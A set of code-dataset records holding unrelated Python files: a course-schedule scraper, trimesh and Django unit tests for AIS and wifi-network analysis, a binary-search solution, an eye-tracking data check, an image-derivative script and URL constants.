Args:\r\n url: URL to the trico searchable schedule course page (string)\r\n page_html: BeautifulSoup object for a given courge page. Optional,\r\n and intended for debugging purposes. 
Typical usage would be\r\n Course('DEBUG',BeautifulSoupObject)\r\n\r\n Raises:\r\n TypeError, if page_html is provided but is not a BeautifulSoup object\r\n \"\"\"\r\n if page_html is None:\r\n page_html = requests.get(url);\r\n page_html = BeautifulSoup(page_html.text,'html.parser')\r\n else:\r\n if type(page_html) is not BeautifulSoup:\r\n raise TypeError('page_html must be a BeautifulSoup object')\r\n\r\n self.regid = self.find_regid(page_html)\r\n self.course_title = self.find_course_title(page_html)\r\n self.dept = self.find_dept(page_html)\r\n self.instructor = self.find_instructor(page_html)\r\n self.time = self.find_time(page_html)\r\n self.room = self.find_room(page_html)\r\n\r\n def get_next_row(self,field):\r\n \"\"\" A simple helper method to advance the table row on the course info page\r\n\r\n Args:\r\n field: Current tag\r\n\r\n Returns: Next tag that is not a new line character\r\n \"\"\"\r\n field = field.next_sibling\r\n while field == '\\n':\r\n field = field.next_sibling\r\n return field\r\n\r\n def find_regid(self,page_html):\r\n \"\"\"Helper method used to extract the registration ID from the course webpage\r\n \r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns: String giving dept. code and course number/section info (e.g. 'CPSC 021 01')\r\n\r\n Raises:\r\n ValueError, if no Registration ID header is found in the table of information\r\n \"\"\"\r\n field = page_html.tr\r\n while field is not None:\r\n if field.td.text == 'Registration ID':\r\n return field.td.next_sibling.text\r\n field = self.get_next_row(field)\r\n raise ValueError('Page source invalid. No Registration ID found.')\r\n\r\n def find_course_title(self,page_html):\r\n \"\"\"Helper method used to extract course title from course webpage\r\n \r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns: String containing course title\r\n\r\n Raises:\r\n ValueError, if no title is found in the table of information\r\n \"\"\"\r\n field = page_html.tr\r\n while field is not None:\r\n if field.td.text == 'Course Title':\r\n return field.td.next_sibling.text\r\n field = self.get_next_row(field)\r\n raise ValueError('Page source invalid. No Course Title found.')\r\n\r\n def find_dept(self,page_html):\r\n \"\"\"Helper method used to extract department from course webpage\r\n\r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns: String containing department in which course is offered\r\n\r\n Raises:\r\n ValueError, if no department is found in the table of information\r\n \"\"\"\r\n field = page_html.tr\r\n while field is not None:\r\n if field.td.text == 'Department':\r\n return field.td.next_sibling.text\r\n field = self.get_next_row(field)\r\n raise ValueError('Page source invalid. 
No Department found.')\r\n\r\n def find_instructor(self,page_html):\r\n \"\"\"Helper method used to extract instructor from course webpage\r\n\r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns: String containing instructor name (format: 'Last_Name,First_Int')\r\n or 'N/A' if the course has no instructor\r\n \"\"\"\r\n field = page_html.tr\r\n while field is not None:\r\n if field.td.text == 'Instructor':\r\n return field.td.next_sibling.text\r\n field = self.get_next_row(field)\r\n return ('N/A')\r\n\r\n def find_time(self,page_html):\r\n \"\"\"Helper method used to convert string with time info to list of time objects\r\n \r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns:\r\n List of DayTime objects, each DayTime object containing information\r\n on the day of the week and the time at which the course meets\r\n \"\"\"\r\n dt_string = self.find_dt_string(page_html)\r\n\r\n dt_list = []\r\n dt_unique = dt_string.split(',')\r\n for dt in dt_unique:\r\n dt = dt.split()\r\n try:\r\n day_list = dt[0]\r\n time = dt[1]\r\n except IndexError: # Raised when the time is an empty string\r\n continue\r\n for indx in range(len(day_list)):\r\n if day_list[indx] == 'M' or day_list[indx] == 'W' or day_list[indx] == 'F':\r\n dt_list.append(DayTime(day_list[indx],time))\r\n elif day_list[indx] == 'T':\r\n if indx == len(day_list) - 1:\r\n dt_list.append(DayTime(day_list[indx],time))\r\n elif day_list[indx + 1] == 'H':\r\n dt_list.append(DayTime(day_list[indx:indx+2],time))\r\n else:\r\n dt_list.append(DayTime(day_list[indx],time))\r\n\r\n return dt_list\r\n\r\n def find_dt_string(self,page_html):\r\n \"\"\"Helper method used to extract string containing time info from course page\r\n\r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns:\r\n String containing time information on the course page (e.g. 'MWF 9:30am-10:20am')\r\n\r\n Raises:\r\n ValueError, if no time info in found in the table of information\r\n \"\"\"\r\n field = page_html.tr\r\n while field is not None:\r\n if field.td.text == 'Time And Days':\r\n return field.td.next_sibling.text\r\n field = field = self.get_next_row(field)\r\n raise ValueError('Page source invalid. No Time/Day found.')\r\n\r\n def find_room(self,page_html):\r\n \"\"\" Helper method used to extract room info from course page\r\n \r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns: String containing room information (e.g. 'Science Center 101')\r\n\r\n Raises:\r\n ValueError, if no room info is found in the table of information\r\n \"\"\"\r\n field = page_html.tr\r\n while field is not None:\r\n if field.td.text == 'Room Location':\r\n return field.td.next_sibling.text\r\n field = field = self.get_next_row(field)\r\n raise ValueError('Page source invalid. 
No Room Location found.')\r\n\r\n def send_to_sqlite(self,cursor):\r\n \"\"\" Method to store the Course attributes in SQLite database\r\n\r\n Args:\r\n cursor: sqlite3 Cursor object\r\n\r\n Raises:\r\n TypeError, if cursor is not an sqlite3 Cursor object\r\n \"\"\"\r\n if type(cursor) is not sqlite3.Cursor:\r\n raise TypeError('Must specify sqlite3 cursor')\r\n else:\r\n cursor.execute(\"\"\"\r\n INSERT INTO course(regid,title,room,instructor,department)\r\n VALUES(?,?,?,?,?)\"\"\", (self.regid,self.course_title,self.room,\r\n self.instructor,self.dept)\r\n )\r\n\r\n for time in self.time:\r\n day = time.day\r\n start_time = time.start.strftime('%H:%M')\r\n end_time = time.end.strftime('%H:%M')\r\n \r\n cursor.execute(\"\"\"\r\n INSERT OR IGNORE INTO day_time(day,start_time,end_time)\r\n VALUES(?,?,?)\"\"\", (day,start_time,end_time)\r\n )\r\n\r\n cursor.execute(\"\"\"\r\n INSERT OR IGNORE INTO course_times(regid,day,start_time,end_time)\r\n VALUES(?,?,?,?)\"\"\", (self.regid,day,start_time,end_time)\r\n )","sub_path":"course.py","file_name":"course.py","file_ext":"py","file_size_in_byte":9187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"353932524","text":"import generic as g\n\n\nclass SectionTest(g.unittest.TestCase):\n\n def setUp(self):\n self.mesh = g.get_mesh('featuretype.STL')\n\n def test_section(self):\n # this hits every case of section due to the geometry of this model\n step = .125\n z_levels = g.np.arange(start=self.mesh.bounds[0][2],\n stop=self.mesh.bounds[1][2] + 2 * step,\n step=step)\n\n for z in z_levels:\n plane_origin = [0, 0, z]\n plane_normal = [0, 0, 1]\n\n\n section = self.mesh.section(plane_origin=plane_origin,\n plane_normal=plane_normal)\n if section is None:\n # section will return None if the plane doesn't\n # intersect the mesh\n assert z > (self.mesh.bounds[1][\n 2] - g.trimesh.constants.tol.merge)\n continue\n\n assert len(section.entities) == len(section.metadata['face_index'])\n planar, to_3D = section.to_planar()\n assert planar.is_closed\n assert (len(planar.polygons_full) > 0)\n \nclass PlaneLine(g.unittest.TestCase):\n\n def test_planes(self):\n count = 10\n z = g.np.linspace(-1, 1, count)\n\n plane_origins = g.np.column_stack((g.np.random.random((count, 2)), z))\n plane_normals = g.np.tile([0, 0, -1], (count, 1))\n\n line_origins = g.np.tile([0, 0, 0], (count, 1))\n line_directions = g.np.random.random((count, 3))\n\n i, valid = g.trimesh.intersections.planes_lines(plane_origins=plane_origins,\n plane_normals=plane_normals,\n line_origins=line_origins,\n line_directions=line_directions)\n self.assertTrue(valid.all())\n self.assertTrue((g.np.abs(i[:, 2] - z) < g.tol.merge).all())\n\n\nif __name__ == '__main__':\n g.trimesh.util.attach_to_log()\n g.unittest.main()\n","sub_path":"tests/test_section.py","file_name":"test_section.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"353843509","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Date : 2019-09-09\n# Author : Yuanbo Zhao (chaojunction@gmail.com)\n\n# https://leetcode.com/problems/find-first-and-last-position-of-element-in-sorted-array/\n# Find First and Last Position of Element in Sorted Array\n\n# returns leftmost (or rightmost) index at which `target` should be inserted in sorted\n# array `nums` via binary search.\ndef extreme_insertion_index(nums: list([int]), target: int, left: bool) -> int:\n lo = 0\n hi = len(nums)\n while 
lo < hi:\n mid = (lo + hi) // 2\n if nums[mid] > target or (left and target == nums[mid]):\n hi = mid\n else:\n lo = mid + 1\n\n return lo\n\n\ndef searchRange(nums: list([int]), target: int) -> list([int]):\n left_idx = extreme_insertion_index(nums, target, True)\n\n # assert that `left_idx` is within the array bounds and that `target`\n # is actually in `nums`.\n if left_idx == len(nums) or nums[left_idx] != target:\n return [-1, -1]\n\n return [left_idx, extreme_insertion_index(nums, target, False) - 1]\n\n\nif __name__ == '__main__':\n nums = [5,5,5,5,5,5]\n print(searchRange(nums, 5))\n\n nums = [5,7,7,8,8,10]\n print(searchRange(nums, 8))\n print(searchRange(nums, 6))\n","sub_path":"Array/二分查找索引.py","file_name":"二分查找索引.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"541705760","text":"\n# coding: utf-8\n\n# ## Library\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nimport os\nimport matplotlib as mpl\n\n\n# *** Validation criterias: ***\n# \n# - We have 18 TRIAL_INDEX\n# \n# - CURRENT_FIX_X and CURRENT_FIX_Y are positives and in the 1920x1080 screen\n# \n# - CURRENT_FIX_START is positive\n# \n# - EYE_USED is always equal to RIGHT\n# \n# - CURRENT_FIX_DURATION is positive\n# \n# - We have 18 WEBSITE_ID\n# \n# - We have 6 x 3 CONDITION \n\n# *** Import Data ***\n\n# In[ ]:\n\n\nrootPath = '../data/'\npartID = 710\n\n\n# In[ ]:\n\n\n# CSV Eye-tracker\ndata = pd.read_csv(\"{0}/part_{1}/part_{1}_clean.csv\".format(rootPath, partID), sep=\",\")\n# CFG Mouse-tracker\nconfig = pickle.load(open(\"{0}/part_{1}/part_{1}.cfg\".format(rootPath, partID), 'rb'))\n\n\n# *** Modification type of features ***\n\n# In[ ]:\n\n\n#data[\"CURRENT_FIX_Y\"] = pd.to_numeric(data[\"CURRENT_FIX_Y\"].str.replace(',','.'))\n#data[\"CURRENT_FIX_X\"] = pd.to_numeric(data[\"CURRENT_FIX_X\"].str.replace(',','.'))\n#data[\"NEXT_SAC_AMPLITUDE\"] = pd.to_numeric(data[\"NEXT_SAC_AMPLITUDE\"].str.replace(\".\", \"\").str.replace(\",\", \".\"))\n#data[\"NEXT_SAC_END_X\"] = pd.to_numeric(data[\"NEXT_SAC_END_X\"].str.replace(\".\", \"\").str.replace(\",\", \".\"))\n#data[\"NEXT_SAC_END_Y\"] = pd.to_numeric(data[\"NEXT_SAC_END_Y\"].str.replace(\".\", \"\").str.replace(\",\", \".\"))\n#data[\"NEXT_SAC_DURATION\"] = pd.to_numeric(data[\"NEXT_SAC_DURATION\"].str.replace(\".\", \"\").str.replace(\",\", \".\"))\n#data[\"NEXT_SAC_ANGLE\"] = pd.to_numeric(data[\"NEXT_SAC_ANGLE\"].str.replace(\".\", \"\").str.replace(\",\", \".\"))\n#data[\"NEXT_SAC_AVG_VELOCITY\"] = pd.to_numeric(data[\"NEXT_SAC_AVG_VELOCITY\"].str.replace(\".\", \"\").str.replace(\",\", \".\"))\n\n\n# In[ ]:\n\n\ndata.dtypes\n\n\n# In[ ]:\n\n\ndata.head()\n\n\n# ## Criterias\n\n# In[ ]:\n\n\na_matrix = np.array([0, 0, 0, 0, 0, 0, 0, 0])\na_matrix\n\n\n# In[ ]:\n\n\ncustom_colors = mpl.colors.LinearSegmentedColormap.from_list(\"\", [\"red\",\"orange\",\"green\"])\n\nplt.matshow([a_matrix], cmap=custom_colors, vmin = 0, vmax = 2)\nplt.show()\n\n\n# *** 18 TRIAL_INDEX ***\n\n# In[ ]:\n\n\n# Sort by TRIAL_INDEX\ndata_sorted = data.TRIAL_INDEX.unique()\ndata_sorted.sort()\n\n\n# In[ ]:\n\n\ngood_trialsID = np.array([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18])\nif ((data_sorted == good_trialsID).all()) :\n a_matrix[0] = 2\n\n\n# *** CURRENT_FIX_X and CURRENT_FIX_Y are positives and in the 1920x1080 screen ***\n\n# In[ ]:\n\n\nfixX_prop_inscreen = 
round(len(data.query(\"CURRENT_FIX_X >= 0 and CURRENT_FIX_X <= 1920\"))/len(data),2)\nfixY_prop_inscreen = round(len(data.query(\"CURRENT_FIX_Y >= 0 and CURRENT_FIX_Y <= 1080\"))/len(data),2)\n\nprint(str(fixX_prop_inscreen*100) + \"% of CURRENT_FIX_X are positives and < 1920 px\")\n\nif (fixX_prop_inscreen == 1):\n a_matrix[1] = 2\nelif (fixX_prop_inscreen > 0.95):\n a_matrix[1] = 1\n \nprint(str(fixY_prop_inscreen*100) + \"% of CURRENT_FIX_Y are positives and < 1080 px\")\n\nif (fixY_prop_inscreen == 1):\n a_matrix[2] = 2\nelif (fixY_prop_inscreen > 0.95):\n a_matrix[2] = 1\n\n\n# In[ ]:\n\n\nfig, axs = plt.subplots(1,2)\n\ndata[\"CURRENT_FIX_X\"].hist(ax=axs[0])\ndata[\"CURRENT_FIX_Y\"].hist(ax=axs[1])\n\n\n# *** CURRENT_FIX_START is positive ***\n\n# In[ ]:\n\n\nfixStart_prop = round(len(data.query(\"CURRENT_FIX_START >= 0\"))/len(data),3) \n\nprint(str(fixStart_prop *100) + \"% of CURRENT_FIX_START are positive\")\nif (fixStart_prop == 1):\n a_matrix[3] = 2\nelif (fixStart_prop > 0.95):\n a_matrix[3] = 1\n\n\n# *** EYE_USED is always equal to RIGHT ***\n\n# In[ ]:\n\n\neye_prop = round(len(data.query(\"EYE_USED == 'RIGHT'\"))/len(data),3)\n\nprint(str(eye_prop*100) + \"% of EYE_USED are right\")\nif (eye_prop == 1):\n a_matrix[4] = 2\n\n\n# *** CURRENT_FIX_DURATION is positive ***\n\n# In[ ]:\n\n\nfixDuration_prop = round(len(data.query(\"CURRENT_FIX_DURATION > 0\"))/len(data),3)\n\nprint(str(fixDuration_prop * 100) + \"% of CURRENT_FIX_DURATION are positive\")\nif (fixDuration_prop == 1):\n a_matrix[5] = 2\n\n\n# *** We have 18 WEBSITE_ID ***\n\n# In[ ]:\n\n\ndef get_website_id(trial_num):\n return config[\"rand_weblist\"][trial_num - 1][\"id\"]\n\ndata[\"WEBSITE_ID\"] = data[\"TRIAL_INDEX\"].apply(get_website_id)\n\nweb = data[\"WEBSITE_ID\"].unique()\nweb.sort()\n\n\n# In[ ]:\n\n\ngood_websites = np.array([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18])\nif ((web == good_websites).all()) :\n a_matrix[6] = 2\n\n\n# *** We have 6 x 3 CONDITION ***\n\n# In[ ]:\n\n\ndef get_condition(trial_num):\n data = config[\"rand_weblist\"][trial_num - 1]\n if(data[\"type\"] == \"free\" and data[\"ad_id\"] == 0 and data[\"mpu_id\"] == 0):\n return 1\n elif(data[\"type\"] == \"target\" and data[\"ad_id\"] == 0 and data[\"mpu_id\"] == 0):\n return 2\n elif(data[\"type\"] == \"free\" and data[\"ad_id\"] > 0 and data[\"mpu_id\"] == 0):\n return 3\n elif(data[\"type\"] == \"target\" and data[\"ad_id\"] > 0 and data[\"mpu_id\"] == 0):\n return 4\n elif(data[\"type\"] == \"free\" and data[\"ad_id\"] > 0 and data[\"mpu_id\"] > 0):\n return 5\n elif(data[\"type\"] == \"target\" and data[\"ad_id\"] > 0 and data[\"mpu_id\"] > 0):\n return 6\n \n return None\n\ndata[\"CONDITION\"] = data[\"TRIAL_INDEX\"].apply(get_condition)\ndata.head()\n\n\n# In[ ]:\n\n\ncond = data[\"CONDITION\"].unique()\ncond.sort()\n\n\n# In[ ]:\n\n\ngood_condition = np.array([1,2,3,4,5,6])\nif ((cond == good_condition).all()) :\n a_matrix[7] = 2\n\n\n# ## CHECK\n\n# In[ ]:\n\n\nplt.matshow([a_matrix], cmap=custom_colors, vmin = 0, vmax = 2)\nplt.show()\n\n","sub_path":"Data_checking/git_log/4.5. Check data consistancy (Single).py","file_name":"4.5. 
Check data consistancy (Single).py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"136784710","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\np= '/home/avishay/Project/RawData/Carte Noire other/58184_187646.png'\nimg = cv2.imread(p)\nsobelx = cv2.Sobel(img,cv2.CV_64F,1,0,ksize=5)\nsobely = cv2.Sobel(img,cv2.CV_64F,0,1,ksize=5)\n\nplt.subplot(3,3,1),plt.imshow(img)\nplt.title('Original'), plt.xticks([]), plt.yticks([])\nplt.subplot(3,3,2),plt.imshow(sobelx[:,:,0],'Reds')\nplt.title('dR/dX'), plt.xticks([]), plt.yticks([])\nplt.subplot(3,3,3),plt.imshow(sobelx[:,:,1],'Greens')\nplt.title('dG/dX'), plt.xticks([]), plt.yticks([])\nplt.subplot(3,3,4),plt.imshow(sobelx[:,:,2])\nplt.title('dB/dX'), plt.xticks([]), plt.yticks([])\n\nplt.subplot(3,3,5),plt.imshow(sobely[:,:,0],'Reds')\nplt.title('dR/dY'), plt.xticks([]), plt.yticks([])\nplt.subplot(3,3,6),plt.imshow(sobely[:,:,1],'Greens')\nplt.title('dG/dY'), plt.xticks([]), plt.yticks([])\nplt.subplot(3,3,7),plt.imshow(sobely[:,:,2])\nplt.title('dB/dY'), plt.xticks([]), plt.yticks([])\n\nplt.show()\n\nplt.imsave('/home/avishay/Project/dB-dY.png',sobely[:,:,2],cmap='Blues')\n","sub_path":"Derivatives.py","file_name":"Derivatives.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"312223439","text":"# Copyright (c) 2015 App Annie Inc. All rights reserved.\n\nINT_AJAX_URLS = [\n {\"url\": \"/ajax/intelligence/metric_picker/update/\",\n \"post_data\": {\n \"page\": \"app_comparator\",\n \"column_config\": {\n \"total_time\": False,\n \"average_mb_per_user\": False,\n \"average_session_duration\": False,\n \"open_rate\": False,\n \"average_session_per_user\": False,\n \"install_penetration\": False,\n \"average_mb_per_session\": False,\n \"average_time_per_user\": False,\n \"average_active_days\": False,\n \"percentage_active_days\": False,\n \"share_of_category_time\": False}}},\n {\"url\": \"/ajax/intelligence/apps/comparator/picker/unified_apps/\",\n \"post_data\": None},\n {\"url\": \"/ajax/intelligence/apps/comparator/picker/saved_search/\",\n \"post_data\": None},\n {\"url\": \"/ajax/intelligence/apps/comparator/picker/default_apps/\",\n \"post_data\": None},\n {\"url\": \"/ajax/intelligence/apps/comparator/table_data.json/\",\n \"post_data\": {\n \"platform\": \"all\",\n \"countries\": \"10\",\n \"granularity\": \"weekly\",\n \"data_source\": \"sampled\",\n \"app_type\": \"app\",\n \"apps\": [{\"id\": 978866413, \"market\": \"ios\"}],\n \"start_date\": \"2015-06-21\",\n \"end_date\": \"2015-12-25\"}},\n {\"url\": \"/ajax/intelligence/apps/comparator/chart_data.json/\",\n \"post_data\": {\n \"chart_type\": \"downloads\",\n \"platform\": \"all\",\n \"countries\": \"10\",\n \"granularity\": \"weekly\",\n \"data_source\": \"sampled\",\n \"apps\": [{\"id\": 978866413, \"market\": \"ios\"}],\n \"app_type\": \"app\",\n \"start_date\": \"2015-06-28\",\n \"end_date\": \"2015-12-27\"}},\n]\n","sub_path":"tests/qa/constants/ajax_urls.py","file_name":"ajax_urls.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"387915461","text":"import csv\n\nfrom aisdecoder import commands as ais_commands\nfrom analysis import commands as analysis_commands\nfrom analysis.services import PointOfInterestService\nfrom networkparser import commands as 
network_commands\n\nimport os\nfrom django.conf import settings\nfrom django.test import TestCase\n\n\nclass GetAISDocumentCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the GetAISDocumentCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.good_ais_file = os.path.join(settings.MEDIA_ROOT, \"testing/ais_testing_2.txt\")\n self.ais_doc = ais_commands.SelectFileCommand(self.good_ais_file).execute()\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n ais_doc_id = self.ais_doc.id\n found_ais_doc = analysis_commands.GetAISDocumentCommand(ais_doc_id).execute()\n\n self.assertEquals(found_ais_doc.docfile, self.good_ais_file)\n self.assertEquals(found_ais_doc, self.ais_doc)\n\n\nclass GetNetworkDocumentCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the GetNetworkDocumentCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.good_network_file = os.path.join(settings.MEDIA_ROOT, \"testing/test_good_networks.netxml\")\n self.network_doc = network_commands.SelectFileCommand(self.good_network_file).execute()\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n network_doc_id = self.network_doc.id\n found_network_doc = analysis_commands.GetNetworkDocumentCommand(network_doc_id).execute()\n\n self.assertEquals(found_network_doc.docfile, self.good_network_file)\n self.assertEquals(found_network_doc, self.network_doc)\n\n\nclass GooglePlacesAPICommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the GooglePlacesAPICommand.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.api_command = analysis_commands.GooglePlacesAPICommand(lat=43.662237,\n lon=-70.274400,\n radius=100,\n keyword='USM')\n\n self.real_result = {\n 'latitude': 43.66218259999999,\n 'longitude': -70.27527979999999,\n 'name': 'University of Southern Maine',\n 'vicinity': '96 Falmouth Street, Portland'}\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n business_dict = self.api_command.execute()\n\n self.assertDictEqual(self.real_result, business_dict)\n\n\nclass GoogleMapsReverseGeoCodingAPICommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the GoogleMapsReverseGeoCodingAPICommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.map_command = analysis_commands.GoogleMapsReverseGeoCodingAPICommand(43.6632770000, -70.2761990000)\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n city, state = self.map_command.execute()\n\n self.assertEquals('Portland', city)\n self.assertEquals('Maine', state)\n\n\nclass MatchBusinessesToNetworksCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the MatchBusinessesToNetworksCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.good_network_file = os.path.join(settings.MEDIA_ROOT, \"testing/test_good_networks.netxml\")\n self.network_doc = network_commands.SelectFileCommand(self.good_network_file).execute()\n network_commands.ParseCommand(self.network_doc).execute()\n\n self.match_command = analysis_commands.MatchBusinessesToNetworksCommand(self.network_doc)\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n matches = 
self.match_command.execute()\n\n self.assertEquals(1, len(matches))\n self.assertDictEqual({u'UMS-Guest': {'business_name': 'University of Southern Maine',\n 'business_vicinity': '96 Falmouth Street, Portland'}},\n matches[0])\n\n\nclass MatchShipsToNetworksCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the MatchShipsToNetworksCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.good_ais_file = os.path.join(settings.MEDIA_ROOT, \"testing/ais_testing_2.txt\")\n self.good_network_file = os.path.join(settings.MEDIA_ROOT, \"testing/test_good_networks.netxml\")\n\n self.ais_doc = ais_commands.SelectFileCommand(self.good_ais_file).execute()\n self.network_doc = network_commands.SelectFileCommand(self.good_network_file).execute()\n\n nmea_sentences = ais_commands.ProcessFileCommand(self.ais_doc).execute()\n for _ in ais_commands.DecodeCommand(nmea_sentences).execute():\n pass\n\n network_commands.ParseCommand(self.network_doc).execute()\n self.real_matches = \\\n {\n u'CRYSTAL SYMPHONY':\n [\n {'client_mac': u'00:0C:E6:02:F3:33',\n 'signal_strength': u'-79',\n 'frequency': u'2437.0',\n 'essid': u'CU@SYMPHONY',\n 'bssid': u'00:0C:E6:02:F3:33',\n 'latitude': 43.656929,\n 'encryption': u'None',\n 'first_seen_time': u'Wed Oct 21 17:45:19 2015',\n 'last_seen_time': u'Wed Oct 21 19:40:41 2015',\n 'longitude': -70.245186}\n ]\n }\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n matches = analysis_commands.MatchShipsToNetworksCommand(self.ais_doc, self.network_doc).execute()\n self.assertDictEqual(self.real_matches, matches)\n\n\nclass ProcessPointsOfInterestCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the ProcessPointsOfInterestCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.points = [{'latitude': 43.3, 'longitude': -70.1, 'radius': 50},\n {'latitude': 43.5, 'longitude': -70.5, 'radius': 100},\n {'latitude': 43.9, 'longitude': -70.7, 'radius': 10}]\n self.session_id = '1'\n self.analysis_service = PointOfInterestService()\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n analysis_commands.ProcessPointsOfInterestCommand(self.points, self.session_id).execute()\n self.assertGreater(self.analysis_service.count_models(session_id=self.session_id), 0)\n\n\nclass MatchNetworksToPointsOfInterestCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the MatchNetworksToPointsOfInterestCommand class.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initialize testing data.\n \"\"\"\n self.points = [{'latitude': 43.655624, 'longitude': -70.252945, 'radius': 100},\n {'latitude': 43.653481, 'longitude': -70.249199, 'radius': 50}]\n self.session_id = '1'\n analysis_commands.ProcessPointsOfInterestCommand(self.points, self.session_id).execute()\n\n self.good_network_file = os.path.join(settings.MEDIA_ROOT, \"testing/test_good_networks.netxml\")\n self.network_doc = network_commands.SelectFileCommand(self.good_network_file).execute()\n network_commands.ParseCommand(self.network_doc).execute()\n\n def test_execute(self):\n \"\"\"\n Test the execute method.\n\n @raise AssertionError: If the test fails.\n \"\"\"\n matches = analysis_commands.MatchNetworksToPointsOfInterestCommand(self.network_doc, self.session_id).execute()\n self.assertGreater(len(matches), 0)\n\n\nclass ExportVicinityCommandTestCase(TestCase):\n \"\"\"\n Unit testing class for the 
ExportVicinityCommand class.\n    \"\"\"\n\n    def setUp(self):\n        \"\"\"\n        Initialize testing data.\n        \"\"\"\n        self.points = [{'latitude': 43.655624, 'longitude': -70.252945, 'radius': 100},\n                       {'latitude': 43.653481, 'longitude': -70.249199, 'radius': 50}]\n        self.session_id = '1'\n        analysis_commands.ProcessPointsOfInterestCommand(self.points, self.session_id).execute()\n\n        self.good_network_file = os.path.join(settings.MEDIA_ROOT, \"testing/test_good_networks.netxml\")\n        self.network_doc = network_commands.SelectFileCommand(self.good_network_file).execute()\n        network_commands.ParseCommand(self.network_doc).execute()\n\n        self.ofile = os.path.join(settings.MEDIA_ROOT, \"testing/vicinity_out.csv\")\n\n    def test_execute(self):\n        \"\"\"\n        Test the execute method.\n\n        @raise AssertionError: If the test fails.\n        \"\"\"\n        with open(self.ofile, 'w') as csv_out:\n            analysis_commands.ExportVicinityCommand(self.network_doc, csv_out, self.session_id).execute()\n\n        with open(self.ofile, 'r') as csv_out:\n            reader = csv.reader(csv_out)\n            header = next(reader)\n            row_1 = next(reader)\n            row_2 = next(reader)\n\n        self.assertEquals(header, ['ESSID', 'Encryption', 'Network Latitude', 'Network Longitude',\n                                   'Point of Interest Latitude', 'Point of Interest Longitude',\n                                   'Point of Interest Radius', 'Distance(m)'])\n        self.assertEquals(row_1, ['Unknown', 'Unknown', '43.655624', '-70.252945',\n                                  '43.655624', '-70.252945', '100.0', '0.0'])\n        self.assertEquals(row_2, ['Unknown', 'Unknown', '43.653481', '-70.249199', '43.653481',\n                                  '-70.249199', '50.0', '0.0'])\n\n\nclass ExportShipToNetworkMatchesCommandTestCase(TestCase):\n    \"\"\"\n    Unit testing class for the ExportShipToNetworkMatchesCommand class.\n    \"\"\"\n\n    def setUp(self):\n        \"\"\"\n        Initialize testing data.\n        \"\"\"\n        self.good_ais_file = os.path.join(settings.MEDIA_ROOT, \"testing/ais_testing_2.txt\")\n        self.good_network_file = os.path.join(settings.MEDIA_ROOT, \"testing/test_good_networks.netxml\")\n\n        self.ais_doc = ais_commands.SelectFileCommand(self.good_ais_file).execute()\n        self.network_doc = network_commands.SelectFileCommand(self.good_network_file).execute()\n\n        nmea_sentences = ais_commands.ProcessFileCommand(self.ais_doc).execute()\n        for _ in ais_commands.DecodeCommand(nmea_sentences).execute():\n            pass\n\n        network_commands.ParseCommand(self.network_doc).execute()\n\n        self.ofile = os.path.join(settings.MEDIA_ROOT, \"testing/ship_network_matches_out.csv\")\n\n    def test_execute(self):\n        \"\"\"\n        Test the execute method.\n\n        @raise AssertionError: If the test fails.\n        \"\"\"\n        with 